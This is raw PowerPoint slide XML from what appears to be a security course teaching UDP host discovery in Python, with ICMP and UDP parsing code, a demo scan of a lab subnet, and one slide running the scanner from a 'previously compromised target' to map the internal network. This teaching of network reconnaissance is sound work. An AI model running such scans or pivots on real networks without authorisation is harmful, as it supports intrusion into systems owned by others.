            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>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80</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805290" y="2844017"/>
            <a:ext cx="10126026" cy="2246769"/>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ICMP</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ipv4_proto == </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6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># If the source is the same as the target, then we should ignore it.</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(ipv4_src_addr == ipv4_dst_addr): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>continue</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icmp_packet_type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icmp_code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icmp_checksum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icmp_data</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parse_icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(ipv4_data)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                    (ipv4_version2, ipv4_header_length2, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                    ipv4_total_length2, ipv4_ttl2, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                    ipv4_proto2, ipv4_header_checksum2, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                    ipv4_src_addr2, ipv4_dst_addr2, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                    ipv4_data2) = parse_ipv4(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>icmp_data</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4</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705536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then parse UDP from the second ipv4 packet data. We check if the extracted data from the UDP packet matches the msg we’ve sent. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>If it matches, then we know that the target is alive.</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81</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837374" y="3132775"/>
            <a:ext cx="1012602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udp_src_port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udp_dest_port</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udp_size</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udp_checksum</a:t>
            </a:r>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udp_data</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parse_udp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(ipv4_data2)</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udp_data</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msg.encode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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>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D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ipv4_src_addr</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is alive!"</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310202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Finally, we define the main function</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82</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789247" y="2430025"/>
            <a:ext cx="10126026" cy="418576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getuid</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"This script must be run as root!"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&lt;host | network&gt;"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192.168.1.5"</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f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 192.168.1.0/24"</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sys.exit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msg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ilikekombucha</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t = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>threading.Thread</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target</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send_discovery_udp</a:t>
            </a:r>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args</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msg))</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t.start</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C586C0"/>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__name__</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"__main__"</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main()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3647344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full code should be available in the course’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> repository at the time of presenting this slide.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>If we run our UDP host discovery.</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83</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757197" y="2971447"/>
            <a:ext cx="1012602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sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> python udp_host_discovery.py 172.16.238.0/24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>172.16.238.100 is alive!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A542D1D-0AED-4CFE-B281-E3DE0FC6948E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1147962" y="3627339"/>
            <a:ext cx="6128084" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If we run this from our previously compromised target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20F1EDB3-5806-4BFB-BEB5-5C6D9638C8F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1757197" y="4129343"/>
            <a:ext cx="10126026" cy="1384995"/>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root@pcpapp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tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>python3.10 udp_host_discovery.py 172.16.238.0/24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>172.16.238.1 is alive!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>172.16.238.11 is alive!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>172.16.238.12 is alive!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>172.16.238.51 is alive!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root@pcpapp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tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"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37633504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Asynchronous UDP Host Discovery</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Instead of doing all the hard work ourselves, we can make our UDP discovery script faster and even more reliable with asyncio.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>We will follow the same logic, but we won’t need to parse packets manually.</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First, we will import needed libraries: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84</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881524" y="3753499"/>
            <a:ext cx="10126026" cy="95410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sys</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asyncio</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random</a:t>
            </a:r>
          </a:p>
          <a:p>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ipaddress</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072415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34508" y="40858"/>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2900714" y="641766"/>
            <a:ext cx="5869505" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Asynchronous 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0" y="1291925"/>
            <a:ext cx="1888476"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define a class containing handlers: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85</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757197" y="1187954"/>
            <a:ext cx="10126026" cy="549381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300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4EC9B0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HostDiscoverer</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def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>self</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>message</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>on_con_lost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i</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.message</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = message</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.on_con_lost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>on_con_lost</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.host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = host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.tries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = tries</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.current_iteration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i</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.transport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>None</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>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def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>connection_made</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>self</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>transport</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.transport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = transport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.transport.sendto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</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.message.encode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>())</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>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def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>datagram_received</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>self</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
